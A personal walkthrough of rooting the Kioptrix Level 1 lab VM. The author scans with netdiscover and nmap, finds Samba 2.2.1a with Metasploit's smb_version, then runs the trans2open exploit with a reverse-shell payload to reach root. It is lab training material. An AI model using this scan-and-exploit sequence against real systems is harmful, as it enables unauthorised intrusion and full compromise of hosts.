Kioptrix Level 1

This is my walkthru for gaining root on the Kioptrix Level 1 machine.

Heathentwitch

~5 min read · April 25, 2026 (Updated: April 25, 2026) · Free: Yes

I started the Kioptrix virtual machine in virtual box to get it up and running I also started my Kali virtual machine to use to attack the Kioptrix VM.

kioptrix vm login

On my Kali machine, I did not know the IP address for the Kioptrix VM so I opened a terminal and entered the following command

netdiscover -r 10.0.2.0/24

netdiscover will look for all hosts on a network. the -r indicates the range of IP addresses I want netdiscover to scan. 10.0.2.0/24 is the virtual network I have set up in my cyber lab.

results from netdiscover scan

The results from the netdiscover scan indicates 3 IP addresses.

I did a NMAP scan on the last IP address of 10.0.2.9 because I knew it was not the top two. I used the following NMAP command to perform the scan

nmap -sC -sV 10.0.2.9

-sC is short way to have NMAP run default scripts and -sV does service version detection

NMAP scan results

With NMAP finishing the scan you can see several open ports to include: 22, 80, 111, 139, 443, 32768. I saw port 139 was open which was running "netbios-ssn samba smbd" so I investigated that further since I know it is vulnerable a lot of the time. The NMAP scan did not provide the version of samba so I opened up Metasploit to try and find out the samba version.

Once Metasploit opened up I wanted to see if there was a module that can be used for determining version of smb so i typed the command

search smb_version

The results only showed one module to use. to use a module in Metasploit type use and the number of the module. In this case it was command was

use 0

I typed in show options to see what options were available to me using this module. I set the RHOSTS to the target machine using the command set RHOSTS 10.0.2.9 and then executed the command with the command run.

show options 
set RHOSTS 10.0.2.9
run

As you can see after you run the exploit it will show you that the samba version is Samba 2.2.1a. Knowing the version went of to google to see if there is an exploit for that particular version of samba.

As we can see rapid7 shows that the trans2open overflow exploit can be used on the version of samba the Kioptrix VM is running. I went back to Metasploit to see if there is a module for trans2open. In Metasploit typed the following commands

search trans2open

It shows that there are 5 modules we can use, I used module 1 because we are dealing with a Linux host. To interact with the module I used this command

use 1

When you get in to the module it shows that there is no payload configured so we need to set the payload. I wanted a reverse shell so I used a generic reverse shell and I set it with the following command, and yes i typed it wrong at first and then corrected the command.

set payload generic/shell_reverse_tcp

Once the payload was set I set the RHOSTS to the target IP address using the command

set RHOSTS 10.0.2.9

With payload and RHOSTS set all that was left to do was execute the exploit using the command

run

After running the exploit you can see that a reverse shell was generated and after I get any shell the first command I run is

whoami

After whoami is run you see that we are root indicating that we have successfully rooted the Kioptrix machine!

If you made it this far thank you for reading my walkthru of Kioptrix Level 1! Stay tuned for more content as I start to document more and more of my journey in cybersecurity.

#ethical-hacking #cybersecurity #pentesting

< Go to the original

Kioptrix Level 1

This is my walkthru for gaining root on the Kioptrix Level 1 machine.

Reporting a Problem